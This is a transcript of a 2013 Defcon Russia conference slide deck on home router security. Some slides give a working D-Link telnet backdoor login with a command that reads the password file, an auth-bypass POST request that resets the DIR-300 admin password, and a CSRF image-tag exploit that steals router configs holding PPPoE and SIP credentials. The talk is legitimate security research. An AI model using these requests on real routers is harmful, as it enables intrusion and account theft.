home router security
DESCRIPTION
Home router security. @090h @ cherboff DCG #7812 10 /0 8 /201 3. .:VENDORS:. VENDORZ = [‘D-Link’, ‘TP-Link’, ‘ASUS’, ‘ ZyXEL ’, ‘ NetGear ’, ‘ Cisco Linksys ’, … ]. .:SERVICES:. SERVICES = [ HTTP, TELNET, SSH, DNS, UPNDP, DHCP, - PowerPoint PPT PresentationTRANSCRIPT
![Page 1: Home router security](https://reader035.vdocument.in/reader035/viewer/2022062301/56815b35550346895dc908f5/html5/thumbnails/1.jpg)
Home router security
@090h
@cherboff
DCG #781210/08/2013
![Page 2: Home router security](https://reader035.vdocument.in/reader035/viewer/2022062301/56815b35550346895dc908f5/html5/thumbnails/2.jpg)
Defcon Russia (DCG #7812) 2
.:VENDORS:.
VENDORZ = [ ‘D-Link’, ‘TP-Link’, ‘ASUS’,‘ZyXEL’, ‘NetGear’,‘Cisco Linksys’,…
]
![Page 3: Home router security](https://reader035.vdocument.in/reader035/viewer/2022062301/56815b35550346895dc908f5/html5/thumbnails/3.jpg)
Defcon Russia (DCG #7812) 3
.:SERVICES:.
SERVICES = [HTTP, TELNET, SSH, DNS,UPNDP, DHCP,TFTP 4 RECOVERY, ]
![Page 4: Home router security](https://reader035.vdocument.in/reader035/viewer/2022062301/56815b35550346895dc908f5/html5/thumbnails/4.jpg)
Defcon Russia (DCG #7812) 4
.:BUGZ:.
ROUTER_VULN_TYPES = [ WPS,COMMAND_INJECTION, PLAIN_TEXT_PASSWORDS,INFO_LEAK,BUFFER_OVERFLOW,AUTH_BYPASS,CSRF, XSS,VENDOR_BACKDORS,]
![Page 5: Home router security](https://reader035.vdocument.in/reader035/viewer/2022062301/56815b35550346895dc908f5/html5/thumbnails/5.jpg)
Defcon Russia (DCG #7812) 5
MEANWHILE IN RUSSIAZyXEL.popular
![Page 6: Home router security](https://reader035.vdocument.in/reader035/viewer/2022062301/56815b35550346895dc908f5/html5/thumbnails/6.jpg)
Defcon Russia (DCG #7812) 6
MEANWHILE IN RUSSIA TP-Link.popular
![Page 7: Home router security](https://reader035.vdocument.in/reader035/viewer/2022062301/56815b35550346895dc908f5/html5/thumbnails/7.jpg)
Defcon Russia (DCG #7812) 7
MEANWHILE IN RUSSIAD-Link.popular
![Page 8: Home router security](https://reader035.vdocument.in/reader035/viewer/2022062301/56815b35550346895dc908f5/html5/thumbnails/8.jpg)
Defcon Russia (DCG #7812) 8
TP-Link.XSSED
![Page 9: Home router security](https://reader035.vdocument.in/reader035/viewer/2022062301/56815b35550346895dc908f5/html5/thumbnails/9.jpg)
Defcon Russia (DCG #7812) 9
DIR-300? REALY??!!
![Page 10: Home router security](https://reader035.vdocument.in/reader035/viewer/2022062301/56815b35550346895dc908f5/html5/thumbnails/10.jpg)
Defcon Russia (DCG #7812) 10
WPAPSK.default = 76543210
![Page 11: Home router security](https://reader035.vdocument.in/reader035/viewer/2022062301/56815b35550346895dc908f5/html5/thumbnails/11.jpg)
Defcon Russia (DCG #7812) 11
D-Link.telnet_backd00r
telnet 192.168.1.1 login: Alphanetworks password: wrgn23_dlwbr_dir300b cat /var/etc/httpasswd
![Page 12: Home router security](https://reader035.vdocument.in/reader035/viewer/2022062301/56815b35550346895dc908f5/html5/thumbnails/12.jpg)
Defcon Russia (DCG #7812) 12
.:REAL_GAME_RULES:.
DEFAULT_AUTH= { ‘admin’: [‘admin’, ‘1234’]}USERS_NEVER_UPDATE = TrueANTIVIRUS_SOFTWATE = NoneONEBUG_EXPLOIT_TARGETS = [
‘D-Link’, ‘NetGear’, ‘Cisco Linksys’]PLATFOTM = {‘ARCH’: ‘MIPS’, ‘OS’: ‘LiNUX’}UID = 0
![Page 13: Home router security](https://reader035.vdocument.in/reader035/viewer/2022062301/56815b35550346895dc908f5/html5/thumbnails/13.jpg)
Defcon Russia (DCG #7812) 13
Dir300.no_auth_password_change
POST http://192.168.1.1:80/tools_admin.php HTTP/1.1 Host: 192.168.1.2 Keep-Alive: 115 Content-Type: application/x-www-form-urlencoded Content-length: 0
ACTION_POST=LOGIN&LOGIN_USER=a&LOGIN_PASSWD=b&login=+Log+In+&NO_NEED_AUTH=1&AUTH_GROUP=0&admin_name=admin&admin_password1=uhOHahEh
![Page 14: Home router security](https://reader035.vdocument.in/reader035/viewer/2022062301/56815b35550346895dc908f5/html5/thumbnails/14.jpg)
Defcon Russia (DCG #7812) 14
ONE_BUG_ARMY
/*
Text
*/
![Page 15: Home router security](https://reader035.vdocument.in/reader035/viewer/2022062301/56815b35550346895dc908f5/html5/thumbnails/15.jpg)
Defcon Russia (DCG #7812) 15
ONE_BUG_ARMY
/*
Text
*/
![Page 16: Home router security](https://reader035.vdocument.in/reader035/viewer/2022062301/56815b35550346895dc908f5/html5/thumbnails/16.jpg)
Defcon Russia (DCG #7812) 16
DIR300.py + SHODAN
![Page 17: Home router security](https://reader035.vdocument.in/reader035/viewer/2022062301/56815b35550346895dc908f5/html5/thumbnails/17.jpg)
Defcon Russia (DCG #7812) 17
Yet one CSRF story
![Page 18: Home router security](https://reader035.vdocument.in/reader035/viewer/2022062301/56815b35550346895dc908f5/html5/thumbnails/18.jpg)
Defcon Russia (DCG #7812) 18
D-Link DPN-5402admin/admin…
![Page 19: Home router security](https://reader035.vdocument.in/reader035/viewer/2022062301/56815b35550346895dc908f5/html5/thumbnails/19.jpg)
19
Wooot?
Defcon Russia (DCG #7812)
![Page 20: Home router security](https://reader035.vdocument.in/reader035/viewer/2022062301/56815b35550346895dc908f5/html5/thumbnails/20.jpg)
Defcon Russia (DCG #7812) 20
YES!CSRF?
![Page 21: Home router security](https://reader035.vdocument.in/reader035/viewer/2022062301/56815b35550346895dc908f5/html5/thumbnails/21.jpg)
Defcon Russia (DCG #7812) 21
Evil Plan.Evil WEB site
CSRF
Evil FTP server
Config
![Page 22: Home router security](https://reader035.vdocument.in/reader035/viewer/2022062301/56815b35550346895dc908f5/html5/thumbnails/22.jpg)
Defcon Russia (DCG #7812) 22
<IMG src=“http://192.168.0.1/goform/cbBackupCfg...
3xplo1T ;-)
![Page 23: Home router security](https://reader035.vdocument.in/reader035/viewer/2022062301/56815b35550346895dc908f5/html5/thumbnails/23.jpg)
23
• Network conf• Usless stuff conf
• PPPOE account• SIP account
Defcon Russia (DCG #7812)
Config
![Page 24: Home router security](https://reader035.vdocument.in/reader035/viewer/2022062301/56815b35550346895dc908f5/html5/thumbnails/24.jpg)
24Defcon Russia (DCG #7812)
Telephony
2-12-85-06
2-12-85-06
2-12-85-06
2-12-85-06
2-12-85-06
2-12-85-06
2-12-85-06
![Page 25: Home router security](https://reader035.vdocument.in/reader035/viewer/2022062301/56815b35550346895dc908f5/html5/thumbnails/25.jpg)
25
• SIP account• Not attached 2 device
• Can be used anywhere• Stealed via stupid CSRF
Defcon Russia (DCG #7812)
Phone number is
![Page 26: Home router security](https://reader035.vdocument.in/reader035/viewer/2022062301/56815b35550346895dc908f5/html5/thumbnails/26.jpg)
26
fin.
Defcon Russia (DCG #7812)
![Page 27: Home router security](https://reader035.vdocument.in/reader035/viewer/2022062301/56815b35550346895dc908f5/html5/thumbnails/27.jpg)
27
$>Questions?
Defcon Russia (DCG #7812)